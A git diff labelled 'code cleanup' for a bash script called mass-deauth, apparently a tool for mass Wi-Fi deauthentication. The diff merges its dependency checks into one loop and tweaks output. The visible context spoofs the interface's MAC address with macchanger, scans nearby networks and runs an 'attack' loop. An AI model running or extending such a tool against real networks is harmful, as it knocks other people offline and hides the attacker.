code cleanup

diff --git a/mass-deauth b/mass-deauth
--- a/mass-deauth
+++ b/mass-deauth
@@ -14,34 +14,12 @@ if [[ $EUID -ne 0 ]]; then
 fi
 
 ########################### LET'S ALSO CHECK FOR REQUIRED PROGRAMS
-command -v xterm > /dev/null 2>&1 || {
-	echo -e >&2 "\033[31m\n    [!] This script requires Xterm to be installed. Aborting . . . [!]\033[0m\n"
-	sleep 1; exit 1
-}
-command -v airmon-ng > /dev/null 2>&1 || {
-	echo -e >&2 "\033[31m\n    [!] This script requires Airmon-ng to be installed. Aborting . . . [!]\033[0m\n"
-	sleep 1; exit 1
-}
-command -v aireplay-ng > /dev/null 2>&1 || {
-	echo -e >&2 "\033[31m\n    [!] This script requires Aireplay-ng to be installed. Aborting . . . [!]\033[0m\n"
-	sleep 1; exit 1
-}
-command -v iw > /dev/null 2>&1 || {
-	echo -e >&2 "\033[31m\n    [!] This script requires iw to be installed. Aborting . . . [!]\033[0m\n"
-	sleep 1; exit 1
-}
-command -v ip > /dev/null 2>&1 || {
-	echo -e >&2 "\033[31m\n    [!] This script requires ip to be installed. Aborting . . . [!]\033[0m\n"
-	sleep 1; exit 1
-}
-command -v iwlist > /dev/null 2>&1 || {
-	echo -e >&2 "\033[31m\n    [!] This script requires iwlist to be installed. Aborting . . . [!]\033[0m\n"
-	sleep 1; exit 1
-}
-command -v macchanger > /dev/null 2>&1 || {
-	echo -e >&2 "\033[31m\n    [!] This script requires GNU macchanger to be installed. Aborting . . . [!]\033[0m\n"
-	sleep 1; exit 1
-}
+for i in xterm airmon-ng aireplay-ng iw ip iwlist macchanger; do
+	command -v $i > /dev/null 2>&1 || {
+		echo -e >&2 "\033[31m\n    [!] This script requires $i to be installed. Aborting . . . [!]\033[0m\n"
+		sleep 1; exit 1
+	}
+done
 
 ########################### LOGICAL STUFF - don't touch unless you're 31337
 version="0.2"
@@ -96,15 +74,14 @@ while [[ ! $moncheck ]]; do
 	moncheck=`iw dev | grep $MIFACE | awk '$0 ~ /Interface / {print $2}'`
 done
 
-echo -e "\e[01;32m[+]\e[00m Changing MAC Address...\n"
-xterm -geometry 75x8+100+0 -T "Mass-Deauth v$version - Changing MAC Address of $MIFACE" -e "ip link set $MIFACE down && macchanger -A $MIFACE && ip link set $MIFACE up" &
-sleep 3
+echo -e "\e[01;32m[+]\e[00m Changing MAC Address..."
+xterm -geometry 75x8+100+0 -T "Mass-Deauth v$version - Changing MAC Address of $MIFACE" -e "ip link set $MIFACE down && macchanger -A $MIFACE && ip link set $MIFACE up; sleep 3" &
 scan1="0"
 
 while true; do
 	curLine="1"
 	x="1"
-	echo -e "\e[01;33m[!] Press [ CTRL+C ]  in this window to kill attack...\e[00m\n"
+	echo -e "\n\e[01;33m[!] Press [ CTRL+C ]  in this window to kill attack...\e[00m\n"
 	if [ $scan1 -ne 0 ]; then echo -e "\e[01;32m[>]\e[00m Sleeping for $waitTime seconds..." && sleep $waitTime; fi
 	rmlogs
 	iwlist $WIFACE scan > /tmp/scan.tmp
